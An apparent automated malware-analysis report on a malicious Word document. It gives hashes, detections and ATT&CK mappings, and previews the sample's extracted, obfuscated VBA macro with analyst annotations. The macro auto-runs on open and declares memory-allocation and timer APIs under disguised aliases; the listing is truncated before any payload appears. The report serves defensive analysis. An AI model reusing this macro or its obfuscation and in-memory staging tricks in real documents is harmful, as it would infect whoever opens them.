Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2a812fbc44b5612…

MALICIOUS

Office (OLE)

270.0 KB · Created: 2018-04-30 12:41:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: ee055bc7f83d2b32e8d09b88b02e79d3 SHA-1: daf4681ae5860ed0d24d0f1693c2bdbb2f4bed1d SHA-256: d2a812fbc44b5612d39806a96631b36f5b98c93458e49eb4f0ace42b6b8d6c66
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document with a high-severity heuristic indicating the presence of VBA macros. The critical ClamAV detection, together with a 'Document_Open' auto-execute macro, indicates that the embedded VBA code is designed to run automatically when the document is opened. This macro likely attempts to download and execute a malicious payload, a common technique for malware distribution; the extracted source also declares NtAllocateVirtualMemory and CreateTimerQueueTimer behind renamed aliases, which is consistent with staging a payload in memory rather than dropping it to disk.

Heuristics 3

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12432 bytes
SHA-256: 610adbeb353139499a91fc3c6c296ea885d1d4eee184d5b2628998c66799d414
Preview script
First 1,000 lines of the extracted script
' Module header of the document class module (VB_Name = "ThisDocument").
' Attribute lines are metadata written by the VBA exporter, not executable code;
' VB_Base = "1Normal.ThisDocument" ties the module to the Word document object.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Two MSForms controls (a Label and an Image) are declared on the document itself.
' No code in this excerpt references them -- possibly decoy UI; confirm against the full source.
Attribute VB_Control = "Label1, 0, 0, MSForms, Label"
Attribute VB_Control = "Image1, 1, 1, MSForms, Image"









' Auto-execute entry point: Word runs Document_Open as soon as the document is
' opened (the OLE_VBA_DOCOPEN heuristic above). The only real work here is the
' call to contemporary, which lives in the "fiat" module further down this
' listing and is truncated in this excerpt.
Private Sub Document_Open()
contemporary
' cranch = 29. Pmt is the built-in financial function; called as a statement
' its result is discarded, so this line appears to be padding/junk -- confirm.
cranch = 18 + 11
Pmt 0, cranch, _
21508, 17882, 7
End Sub

' Textbook binary search over a 1..1000 array, printing only to the Immediate
' window (Debug.Print). Nothing in this excerpt calls it -- presumably decoy
' code included to make the module look benign; confirm against the full source.
Sub Binary_Search_of_Array()
' Declares indices 0..1000; only 1..1000 are filled below, so intThousand(0) stays 0.
Dim intThousand(1000) As Integer
Dim i As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant

For i = 1 To 1000
intThousand(i) = i
Next i

' Hard-coded search key; there is no user input despite the variable name.
varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)

Do
' "/" is floating-point division; the Double is rounded (not truncated) when stored in the Integer.
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
' Stops when the key is found at intMiddle or the window has collapsed.
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)

If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub










' Module header for "pirogue". The paired GUIDs in VB_Base are the form the
' exporter writes for a UserForm, so this is presumably a form module -- verify.
' Later code in this listing reads a control on it as pirogue.bled.
Attribute VB_Name = "pirogue"
Attribute VB_Base = "0{AE8575F6-E7FA-4E7F-9ABD-961D5AFD3A77}{7C29B447-0C4C-4FAD-B4C8-52E812AFD12D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





' Standard module "fiat": holds the Win32 API declarations and the worker Subs.
Attribute VB_Name = "fiat"
' The arithmetic in both #If lines constant-folds away: this one reduces to
' 700 > -220 And Not (0 < Win64), the next to 700 > -220 And (0 < Win64).
' Net effect appears to be a 32-/64-bit switch keyed on the Win64 compile
' constant, dressed up as noise to defeat pattern matching -- confirm which
' branch each bitness takes.
' cloture is an alias for kernel32!CreateTimerQueueTimer (no PtrSafe; pre-VBA7 form).
' The meaningless parameter names hide the real API from a casual read.
#If (1 - 23 + 422 + 103 - 33 + 230) > ((11 - 5 + 314) - (124 - 119 + 535) * 1) And Not ((8 - 29 + 49) - (50 - 49 + 27)) * 2 < (Win64) Then
Public Declare Function cloture _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (clupeidae As Any, ByVal derm As Any, ByVal turgescence As Any, ByVal quartz As Any, ByVal blade As Any, ByVal ascribable As Any, ByVal lepadidae As Any) As Long
#End If
' democratization is an alias for ntdll!NtAllocateVirtualMemory (PtrSafe, LongPtr
' parameters: the 64-bit form). The library name is padded with trailing spaces --
' presumably to dodge naive string matching on "ntdll"; the loader tolerates it.
' Declaring a memory-allocation primitive next to a timer-queue callback API is
' consistent with in-memory payload staging; the callers are not in this excerpt.
#If (25 - 96 + 471 + 103 - 20 + 217) > ((22 - 101 + 399) - (66 - 3 + 477) * 1) And ((38 - 5 - 5) - (41 - 8 - 5)) * 2 < (Win64) Then
Public Declare PtrSafe Function democratization _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (deau As LongPtr, setto As LongPtr, ByVal rosewood As LongPtr, dyslexicByVal As LongPtr, almandite As LongPtr, ByVal briefcase As LongPtr) As LongPtr
#End If
' Thin forwarding wrapper: copies its three Variant arguments into typed locals
' and hands them, plus a constant -1, to consuecere (not defined in this
' excerpt). Most other statements are padding. There is no "aught = ..."
' assignment, so the function returns Empty.
'   leones        -> vendibility (Long), passed 2nd to consuecere
'   ascendable    -> mauers (Long), passed 3rd
'   pseudoscience -> arsine (Long), passed 4th
'   penalty       -> passed 5th, never assigned here (0); possibly an out-parameter -- verify in consuecere
Function aught(leones, ascendable, pseudoscience)
Dim vendibility As Long
Dim antony As Integer
Dim adiabatic As Long
Dim muhlenbergia As Integer
Dim mauers As Long
Dim joined As Variant
Dim penalty As Long
Dim fro As Long
Dim arsine As Long
Dim carcase As Long
Dim hoarsely As String
' freedom is not declared anywhere in this excerpt; with no Option Explicit
' visible it reads as Empty. Both lines are no-op padding.
barrette = freedom
barrette = barrette
vendibility = leones
arsine = pseudoscience
mauers = ascendable
' angloamerican = 75; Pmt result is discarded -- padding.
angloamerican = 37 + 38
Pmt 0, angloamerican, 38791, 31118, 2
conclusions = "rotl"
' adiabatic = -1.
adiabatic = 85 - 95 + 9
' The one call that matters; consuecere's body is outside this excerpt.
consuecere ByVal adiabatic, _
vendibility, mauers, _
arsine, penalty
' Rnd result discarded -- padding.
emotion = Rnd(495)
End Function
Sub contemporary()
Dim mimosa As Long
Dim repetitively As Variant
pirogue.bled.Value = Day(#12/5/2013#)
misjoining = drifting
epinephelus = scoreboard
encroach = consecrate
Set bassinet = pirogue.bled.SelectedItem
mystification = 4 + 4
Pmt 0, mystification, 38252, 46702, 7
pneumonitis = bassinet.Name
epagoge = 59 - 80 + 7865
neckless = Right(pneumonitis, epagoge)
esau = pseudopod.elevation(neckless)
ciprofloxacin = 55 + 6
Pmt 0, ciprofloxacin, 19211, 52372, 8
#If (48 - 107 + 459 + 108 - 69 + 261) > ((34 - 5 + 291) - (96 - 95 + 539) * 1) And ((106 - 74 - 4) - (26 - 124 + 126)) * 2 < (Win64) Then
Dim popularly As Byte
Dim mewed As LongPtr
Dim nousel As LongPtr
Dim cloy As Integer
#ElseIf (65 - 26 + 361 + 35 - 93 + 358) > ((11 - 82 + 391) - (49 - 104 + 595) * 1) And Not ((78 - 12 - 38) - (127 - 24 - 75)) * 2 < (Win64) Then
Dim algal As Byte
Dim nousel As Long
Dim astound As Integer
Dim mewed As Long
#End If
accoucheur = 35 - 100 + 65
amoristic = "attica"
blanched = "nephron"
devastation = 73 - 79 + 4102
agape = 
... (truncated)